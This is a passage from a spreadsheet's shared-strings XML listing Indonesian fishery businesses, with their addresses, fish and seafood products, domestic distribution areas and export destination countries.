    <t>Ikan Demersal Beku (Pisang-pisang, Kerapu, Layur, Sukang, Kakap, Ekor Kuning)</t>
  </si>
  <si>
    <t>Jl. Mesjid No.289, Kel. Sugiharjo Dusun II, Kec. Batang Kuis, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Kabupaten Deli Serdang, Kota Medan, Kota Bandar Lampung, Kota Denpasar</t>
  </si>
  <si>
    <t xml:space="preserve">Salmon Bernilai Tambah Beku (Bakso Salmon, Salmon Berlapis Tepung Beku, Burger Salmon) </t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kota Bandung, Kota Bekasi, Kota Tangerang</t>
  </si>
  <si>
    <t>Brunei Darussalam, Japan, Malaysia, Philippines, Saudi Arabia, Singapore, Thailand, United States</t>
  </si>
  <si>
    <t>Lingkungan II, Kel. Batuputih Bawah, Kec. Ranowulu, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Bogor, Kota Surabaya, Kota Manado</t>
  </si>
  <si>
    <t>BTN Pole Indah Mas, Jl.Mutiara Blok H 28, Kel. Darma, Kec. Polewali, Kabupaten Polewali Mandar&lt;br&gt;Sulawesi Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Bandung, Kota Manado, Kota Makassar</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Bandung, Kota Makassar</t>
  </si>
  <si>
    <t>Kp. Pulau Nipah, Jembatan II, Kel. Pulau Setokok, Kec. Bulang, Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Jl. Raya Rembang - Tuban Km 28, Kel. Sendangmulyo, Kec. Sluke, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Besar, Malong, Kuniran, Kerapu, Layur, Coklatan, Seabream, Kapas-kapas, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Makerel, Lemadang, Banjar, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Dusun Dermo No.89, Kel. Gunung Gangsir, Kec. Beji, Kabupaten Pasuruan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Barramundi, Bawal Hitam, Lencam, Anggoli, Kakatua, Kakap Merah)</t>
  </si>
  <si>
    <t>France, United States</t>
  </si>
  <si>
    <t>France, Guadeloupe, United States</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Julung-julung, Lemadang, Marlin, Tenggiri)</t>
  </si>
  <si>
    <t>France, United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok I Kav V, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl. Anyelir XII No.13 X Br. Dukuh, Kel. Dauh Peken, Kec. Tabanan, Kabupaten Tabanan&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Kabupaten Tabanan, Kabupaten Badung, Kota Denpasar</t>
  </si>
  <si>
    <t>Minuman Rumput Laut</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Naget Ikan, Siomay Ikan, Kaki Naga, Otak-otak Ikan, Keong Mas, Sosis Ikan) </t>
  </si>
  <si>
    <t>Lingkungan III, Kel. Meras, Kec. Bunaken, Kota Manado&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Daging Perut Tuna Beku</t>
  </si>
  <si>
    <t>Kompleks PPP Goto, Kel. Goto, Kec. Tidore, Kota Tidore Kepulauan&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Manado, Kota Bitung, Kota Makassar</t>
  </si>
  <si>
    <t>Australia, Bangladesh, China, Germany, Hong Kong, India, Pakistan, Singapore, United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Datuk Laksmana RT 01 RW 01, Kel. Tanjung Medang, Kec. Rupat Utara, Kabupaten Bengkalis&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Hidup (Betutu, Parang-parang)</t>
  </si>
  <si>
    <t>Dusun Harapan Jaya RT 04, Kel. Lalang Jaya, Kec. Manggar, Kabupaten Belitung Timur&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Bakso Ikan, Nugget Ikan, Kaki Naga, Otak-Otak Ikan, Pempek Ikan, Lumpia Ikan, Batagor Ikan)</t>
  </si>
  <si>
    <t>Kabupaten Belitung Timur</t>
  </si>
  <si>
    <t>Jl. Semampar No.1 Komplek PHPT Muara Angke, Kel. Pluit, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Jl. Raya Desa Jiken Blok I No. 8, Kel. Jiken, Kec. Tulangan, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Hidrolisat Udang</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Semarang, Kabupaten Pasuruan, Kabupaten Jombang</t>
  </si>
  <si>
    <t>Australia, Bangladesh, Malaysia, Saudi Arabia, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Hidrolisat Ikan</t>
  </si>
  <si>
    <t>Kabupaten Rejang Lebong, Kabupaten Lebong, Kota Bengkulu</t>
  </si>
  <si>
    <t>Kp. Suka Maju RT 004 RW 012, Kel. Kijang Kota, Kec. Bintan Timur, Kabupaten Bintan&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Barakuda, Tongkol, Gabus Laut, Layang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Jahan, Kerapu, Talang-talang, Kakap, Parang-parang)</t>
  </si>
  <si>
    <t>Jl. Bisma Raya Blok D1 No.33, Kel. Papanggo, Kec. Tanjung Priok, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Australia, Hong Kong, Korea, Democratic People's Republic of, United States</t>
  </si>
  <si>
    <t>Jl. Kepiting No.16 RT 002 RW 001, Kel. Dufa-dufa, Kec. Ternate Utara, Kota Ternate&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Surabaya, Kota Manado, Kota Ternate</t>
  </si>
  <si>
    <t>China, Egypt, India, Italy, Japan, Korea, Democratic People's Republic of, Malaysia, Morocco, Pakistan, Saudi Arabia, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Surabaya, Kota Manado</t>
  </si>
  <si>
    <t>Citra Sudiang Estate Blok A1 No. 33 Kel. Sudiang Raya, Kec. Biringkanaya, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Ir. Sutami, Komplek Pergudangan Lantebung Blok A 11 No.9B, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Jl. Ir. Sutam,i Komplek Pergudangan Lantebung Blok A 11 No.9B, Kel. Parang Loe, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Setan, Lemadang, Marlin, Meka, Gindara, Tenggiri)</t>
  </si>
  <si>
    <t>Malaysia, Philippines, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>China, Malaysia, Philippines, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Kuwe, Anggoli, Kerapu, Layur, Kakap)</t>
  </si>
  <si>
    <t>Malaysia, Philippines, Singapore, Taiwan, Province of China, Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Puri Kompleks PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demesal Beku (Barramundi, Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>RT 001 RW 019, Kel. Aermadidi Atas, Kec. Aermadidi, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Produk Perikanan Bernilai Tambah Beku (Naget Ikan)</t>
  </si>
  <si>
    <t>Chilled Pasteurized Tuna</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Sebelah, Manyung, Kerapu, Layur, Kakap, Kuro)</t>
  </si>
  <si>
    <t>Jl. Abraham O Atururi, Kel. Suprauw, Kec. Maladum Mes, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Hong Kong, Singapore, Thailand</t>
  </si>
  <si>
    <t>Jl. Pulau Irian Kompleks Miel Nusantara I No. 3A KIM, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Bawal Hitam, Kambing-kambing, Sebelah, Kerapu)</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Lele, Gurame, Bandeng, Patin, Nila)</t>
  </si>
  <si>
    <t>Komplek Pergudangan Mutiara Margomulyo Indah Blok DC 1, Kel. Manukan Wetan, Kec. Tandes, Kota Surabaya&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Jl. Panglima Minal RT 02 RW 02, Kel. Senggoro, Kec. Bengkalis, Kabupaten Bengkalis&lt;br&gt;Riau</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Tongkol, Sarden, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Mata Besar, Swanggi, Sebelah, Senangin, Layur, Kakap, Kurau)</t>
  </si>
  <si>
    <t>Ikan Air Tawar Segar (Betutu, Nila)</t>
  </si>
  <si>
    <t>Dusun Sidorukun RT 002 RW 001, Kel. Selo Retno, Kec. Sidomulyo, Kabupaten Lampung Selatan&lt;br&gt;Lampung</t>
  </si>
  <si>
    <t>Jl. Gabion Perikanan Perum Prasarana Perikanan Samudera Belawan, Kel. Bagan Deli, Kec. Medan Belawan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Cephalopoda Beku (Cumi-cumi, Sotong, Gurita)</t>
  </si>
  <si>
    <t>Kota Sibolga, Kota Pematang Siantar, Kota Medan, Kota Padang, Kota Pekanbaru, Kota Palembang, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakatua, Gulama, Kambing-kambing, Sebelah, Kerapu, Layur, Merah)</t>
  </si>
  <si>
    <t>Kabupaten Aceh Singkil, Kabupaten Deli Serdang, Kabupaten Batu Bara, Kota Sibolga, Kota Tanjung Balai, Kota Medan</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Lemuru, Mata Besar, Tongkol, Salem)</t>
  </si>
  <si>
    <t>Kabupaten Batu Bara, Kota Sibolga, Kota Pematang Siantar, Kota Medan, Kota Padang, Kota Pekanbaru, Kota Jambi, Kota Palembang, Kota Jakarta Utara, Kota Pontianak</t>
  </si>
  <si>
    <t>Kabupaten Aceh Singkil, Kabupaten Deli Serdang, Kabupaten Batu Bara, Kota Medan</t>
  </si>
  <si>
    <t>Cephalopoda Segar (Cumi-cumi, Sotong, Gurita)</t>
  </si>
  <si>
    <t>Kabupaten Batu Bara, Kota Sibolga, Kota Tanjung Balai, Kota Medan</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakatua, Gulama, Kambing-kambing, Sebelah, Kerapu, Layur, Merah)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Kembung, Tongkol, Kuring, Salem, Selayang, Aso-aso, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Lencam, Biji Nangka, Kerapu, Malabar, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>Jl. Raya Lamongan - Gresik Km 40, Kel. Rejosari, Kec. Deket, Kabupaten Lamongan&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kod, Kakap, Kerapu, Lencam, Kakaktua)</t>
  </si>
  <si>
    <t>Jl. Ps. Lelang Ikan Muara Baru No. 87 RT 20 RW 17 Pelabuhan Perikanan Samudera Nizam Zachman, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Saudi Arabia, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Jl. Medan Belawan KM. 17,5, Kel. Pekan Labuhan, Kec. Medan Labuhan, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Biji Nangka, Kerapu, Layur, Kakap)</t>
  </si>
  <si>
    <t>Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Desa Kolongan Jaga II No.44, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Nila Beku</t>
  </si>
  <si>
    <t>Desa Kolongan Jaga II No.44, Kel. Kolongan Jaga II, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Australia, Canada, France, Korea, Democratic People's Republic of, Thailand, United States</t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Samudera Nizam Zachman, Jl. Muara Baru Ujung Blok K No.1-2, Kel. Penjaringan, Kec. Penjaringan , Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kota Depok, Kabupaten Tangerang, Kota Tangerang Selatan</t>
  </si>
  <si>
    <t>Jl. Pulau Solor No. 11 KIM-II, Kel. Saentis, Kec. Percut Sei Tuan, Kabupaten Deli Serdang&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Canada, Philippines, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kuring, Todak)</t>
  </si>
  <si>
    <t>Thailand, United States, Viet Nam</t>
  </si>
  <si>
    <t>Perumahan Bumi Kawangkoan Baru, Kel. Kawangkoan Baru Jaga XII, Kec. Kalawat, Kabupaten Minahasa Utara&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Krispy Ikan</t>
  </si>
  <si>
    <t>Jl. DP. Negara Gg DP Negara III RT 29 RW 01 No.20, Kel. Sukarami, Kec. Selebar, Kota Bengkulu&lt;br&gt;Bengkulu</t>
  </si>
  <si>
    <t xml:space="preserve">Produk Perikanan Bernilai Tambah Beku (Bakso, Naget, Siomay, Roll Ikan, Keong Mas) </t>
  </si>
  <si>
    <t>Kawasan Pelabuhan Perikanan Samudera Nizam Zachman Jakarta Blok M Kav. No. 9-10, Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Barakuda, Bonito, Cobia, Julung-julung, Kembung, Lemadang)</t>
  </si>
  <si>
    <t>Japan, Malaysia, Singapore, Thailand, Ukraine, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Bawal Hitam, Gulama, Lencam, Manyung, Kuwe)</t>
  </si>
  <si>
    <t>Jl. Medan-Banda Aceh, Kel. Gampong Baro, Kec. Idi Rayeuk, Kabupaten Aceh Timur&lt;br&gt;Aceh</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Kembung, Lemadang, Sarden, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Austria, Belgium, Denmark, Finland, Malaysia, Netherlands, Poland, Sweden, Thailand, United Arab Emirates</t>
  </si>
  <si>
    <t>Jl. Raya Suli Atas, Kel. Suli, Kec. Salahutu, Kabupaten Maluku Tengah&lt;br&gt;Maluku</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Teri, Baby Tuna, Tongkol, Kembung, Marlin, Selar, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Tanjung Merah, Kel. Manembo Nembo Bawah, Kec. Matuari, Kota Bitung&lt;br&gt;Sulawesi Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kuwe, Kerapu, Kakatua, Kakap)</t>
  </si>
  <si>
    <t>China, Japan, Taiwan, Province of China, Thailand, United Kingdom, United States</t>
  </si>
  <si>
    <t>Jl. Muara Baru Ujung Blok M No.1-2 (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Amberjack, Pacific Saury, Alfosino, Barakuda, Makerel, Ekor Kuning)</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Layur, Red Tilefish, Red Sea Bream, Lepu, Seabass, Gerot, Kuwe)</t>
  </si>
  <si>
    <t>Jl. Pasar Ikan Blok L No.23 Pasar Baru Koto 2, Kel. Malabero, Kec. Teluk Segara, Kota Bengkulu&lt;br&gt;Bengkulu</t>
  </si>
  <si>
    <t>Kota Padang, Kota Bengkulu</t>
  </si>
  <si>
    <t>China, Japan, Taiwan, Province of China, Thailand, United Kingdom, United States, Viet Nam</t>
  </si>
  <si>
    <t>Belgium, Japan, Thailand, United Kingdom, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Malalugis, Pedang)</t>
  </si>
  <si>
    <t>Jl. Strat 2 RT 17 No.30 , Kel. Gunung Samarinda, Kec. Balikpapan Utara, Kota Balikpapan&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Peyek Kepiting</t>
  </si>
  <si>
    <t>Jl. Botuliodu, Kel. Tenda, Kec. Hulonthalangi, Kota Gorontalo&lt;br&gt;Gorontalo</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Panni, Tongkol, Layang, Cakalang)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Japan, Singapore, United States</t>
  </si>
  <si>
    <t>Kabupaten Maluku Barat Daya</t>
  </si>
  <si>
    <t>Jl. Sersan Anwar Bay RT 01, Kel. Bagan Pete, Kec. Alam Barajo, Kota Jambi&lt;br&gt;Jambi</t>
  </si>
  <si>
    <t>Jl. Wolter Monginsidi No. 28, Kel. Nalu, Kec. Baolan, Kabupaten Toli-Toli&lt;br&gt;Sulawesi Tengah</t>
  </si>
  <si>
    <t>Jl. Wr. Supratman RT 07 No.31, Kel. Kandang Limun, Kec. Muara Bangka Hulu, Kota Bengkulu&lt;br&gt;Bengkulu</t>
  </si>
  <si>
    <t>Jl. Bakaran Batu 16AA, Kel. Sei Rengas Permata, Kec. Medan Area, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>China, Hong Kong, Viet Nam</t>
  </si>
  <si>
    <t>China, Hong Kong, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Japan, Malaysia, United States</t>
  </si>
  <si>
    <t>Jl. Homebes RT 01 RW 02, Kel. Batu Walenrang, Kec. Telluwanua, Kota Palopo&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Australia, China, Hong Kong, Korea, Democratic People's Republic of, United States</t>
  </si>
  <si>
    <t>Prima Centre 1 Blok I No.3 RT 009 RW 002, Kel. Kedaung Kaliangke, Kec. Cengkareng, Kota Jakarta Barat&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Italy, Japan, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Raya Belinyu RT 03, Kel. Sinar Jaya Jelutung, Kec. Sungailiat, Kabupaten Bangka&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Kabupaten Bangka, Kabupaten Bangka Barat, Kabupaten Bangka Tengah, Kabupaten Bangka Selatan, Kota Pangkal Pinang</t>
  </si>
  <si>
    <t>Kota Palembang, Kabupaten Bangka, Kabupaten Bangka Barat, Kabupaten Bangka Tengah, Kabupaten Bangka Selatan, Kota Pangkal Pinang</t>
  </si>
  <si>
    <t>Kerupuk Ikan, Kerupuk Udang, Kerupuk Cumi-cumi</t>
  </si>
  <si>
    <t>Jl. HOS Cokroaminoto No.77, Kel. Sungailiat, Kec. Sungailiat, Kabupaten Bangka&lt;br&gt;Kepulauan Bangka Belitung</t>
  </si>
  <si>
    <t>Kabupaten Bangka, Kota Pangkal Pinang</t>
  </si>
  <si>
    <t>Getas Ikan</t>
  </si>
  <si>
    <t>China, Hong Kong, Singapore, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Dusun III, Kel. Dulomo, Kec. Tilango, Kabupaten Gorontalo&lt;br&gt;Gorontalo</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Bawal Hitam, Gulama, Kerapu, Layur, Bawal, Kakap Merah)</t>
  </si>
  <si>
    <t>Pergudangan Kartika Blok B No. 2 Batu Ampar Batam, Kel. Taman Baloi, Kec. Batam Kota, Kota Batam&lt;br&gt;Kepulauan Riau</t>
  </si>
  <si>
    <t>Kota Tanjung Balai, Kota Jambi, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Putih, Malong)</t>
  </si>
  <si>
    <t>Kota Jambi, Kota Batam, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Tongkol, Jahan, Selar, Benggol, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Tanjung Balai, Kota Jambi, Kota Batam, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Kota Pekanbaru, Kota Jambi, Kota Batam, Kota Jakarta Pusat</t>
  </si>
  <si>
    <t>Salmon Kaleng</t>
  </si>
  <si>
    <t>Salmon Pouch</t>
  </si>
  <si>
    <t>Jl. Jawa Blok G-1, Kel. Ganda Mekar, Kec. Cikarang Barat, Kabupaten Bekasi&lt;br&gt;Jawa Barat</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Bandung, Kabupaten Bekasi, Kota Bogor, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang</t>
  </si>
  <si>
    <t>Kota Jakarta Utara, Kabupaten Bogor, Kabupaten Bandung, Kabupaten Bekasi, Kota Bekasi, Kabupaten Tangerang, Kota Tangerang</t>
  </si>
  <si>
    <t>Pergudangan Safe N Lock Blok V 3128-3130, Jl Lingkar Timur Km 5,5, Kel. Rangkahkidul, Kec. Sidoarjo, Kabupaten Sidoarjo&lt;br&gt;Jawa Timur</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Deho, Terbang, Kembung, Salem, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, United States</t>
  </si>
  <si>
    <t>American Samoa, China, Hong Kong, Korea, Democratic People's Republic of</t>
  </si>
  <si>
    <t>China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Swanggi, Gulama, Katamba, Kerapu, Kakatua, Bawal, Kakap, Kurisi)</t>
  </si>
  <si>
    <t>China, Hong Kong, Japan, Korea, Democratic People's Republic of, Taiwan, Province of China, United States</t>
  </si>
  <si>
    <t>Kawasan Industri Perikanan Samudera Blok K Kav 1, Jl. Muara Baru Ujung (Room 1), Kel. Penjaringan, Kec. Penjaringan, Kota Jakarta Utara&lt;br&gt;DKI Jakarta</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Gulama, Kerapu, Layur, Kakap Merah)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Salem, Cakalang, Selar Kuning)</t>
  </si>
  <si>
    <t>Jl. Pulau Nias Selatan No.1 KIM 3, Kel. Mabar, Kec. Medan Deli, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Kembung, Salem, Aso-aso)</t>
  </si>
  <si>
    <t>Jl. Kima 8 Kav SS No. 23A Kawasan Industri Makassar, Kel. Bira, Kec. Tamalanrea, Kota Makassar&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Australia, China, Korea, Democratic People's Republic of, Korea, Republic of, United States, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kakap Merah, Kakap)</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Kakap Merah, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Layur, Lemadang, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Layur, Lemadang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Makassar</t>
  </si>
  <si>
    <t>Jl. Taman Mahardika No.26, Kel. Benoa, Kec. Kuta Selatan, Kabupaten Badung&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Canada, China, Hong Kong, Korea, Democratic People's Republic of, Taiwan, Province of China</t>
  </si>
  <si>
    <t>Canada, China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Taiwan, Province of China, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Taman Mahardika No. 26 Nusa Dua, Kel. Benoa, Kec. Kuta Selatan, Kabupaten Badung&lt;br&gt;Bali</t>
  </si>
  <si>
    <t>Canada, China, Hong Kong, Korea, Republic of, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Canada, China, Hong Kong, Korea, Democratic People's Republic of, Malaysia, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerisi, Kerapu, Layur, Bawal, Kakap)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Teri, Lemuru, Tongkol, Terbang, Tembang, Kembung)</t>
  </si>
  <si>
    <t>Canada, China, Hong Kong, Korea, Democratic People's Republic of, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Canada, China, Hong Kong, Korea, Democratic People's Republic of, Malawi, Singapore, Taiwan, Province of China, Thailand, Viet Nam</t>
  </si>
  <si>
    <t>Jl. Abraham O. Atururi, Kel. Suprauw, Kec. Maladum Mes, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Abalon Segar</t>
  </si>
  <si>
    <t>Jl. Poros Kariango, Dusun Majannang, Kel. Kurusumange, Kec. Tanralili, Kabupaten Maros&lt;br&gt;Sulawesi Selatan</t>
  </si>
  <si>
    <t>Russian Federation, United States</t>
  </si>
  <si>
    <t>Jl. Puri No.24, Kel. Kotamatsum III, Kec. Medan kota, Kota Medan&lt;br&gt;Sumatera Utara</t>
  </si>
  <si>
    <t>Ikan Air Tawar Beku (Jurung, Betutu)</t>
  </si>
  <si>
    <t>Kota Medan, Kota Jakarta Utara</t>
  </si>
  <si>
    <t>Dusun Palikaja RT 14 RW 05, Kel. Laju, Kec. Langgudu, Kabupaten Bima&lt;br&gt;Nusa Tenggara Barat</t>
  </si>
  <si>
    <t>Jl. Macan Tutul RT 001 RW 001, Kel. Dum Barat, Kec. Sorong Kepulauan, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Jl. Raya Tuban ‚Äì Semarang Km 57, Kel. Temperek, Kec. Sarang, Kabupaten Rembang&lt;br&gt;Jawa Tengah</t>
  </si>
  <si>
    <t>Ikan Demersal Beku (Mata Besar, Gulama, Lousan, Kerapu, Remang, Layur, Sukang)</t>
  </si>
  <si>
    <t>Jl. Puri Komplek PPI Klademak II Pantai, Kel. Klaligi, Kec. Sorong Manoi, Kota Sorong&lt;br&gt;Papua Barat</t>
  </si>
  <si>
    <t>Ikan Pelagis Beku (Deho, Kembung, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Jl. Persatuan Gg Keladi No.61 RT 47, Kel. Manggar Baru, Kec. Balikpapan Timur, Kota Balikpapan&lt;br&gt;Kalimantan Timur</t>
  </si>
  <si>
    <t>Kota Batam, Kota Jakarta Barat</t>
  </si>
  <si>
    <t>Desa Sayoang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Kota Jakarta Pusat, Kota Surabaya, Kota Denpasar, Kota Bitung, Kota Ternate</t>
  </si>
  <si>
    <t>China, Korea, Democratic People's Republic of, Singapore, Viet Nam</t>
  </si>
  <si>
    <t>Desa Sayoang, Kel. Sayoang, Kec. Bacan Timur, Kabupaten Halmahera Selatan&lt;br&gt;Maluku Utara</t>
  </si>
  <si>
    <t>Ikan Demersal Segar (Kerapu, Kakap Merah, Tenggiri)</t>
  </si>
  <si>
    <t>Ikan Pelagis Segar (Baby Tuna, Tongkol, Kembung, Layang, Cakalang, Tenggiri)</t>
  </si>
  <si>
    <t>Kota Jakarta Selatan, Kota Jakarta Timur, Kota Jakarta Pusat, Kota Jakarta Barat, Kota Jakarta Utara, Kabupaten Semarang, Kota Semarang, Kota Surabaya, Kota Denpasar</t>
  </si>
  <si>
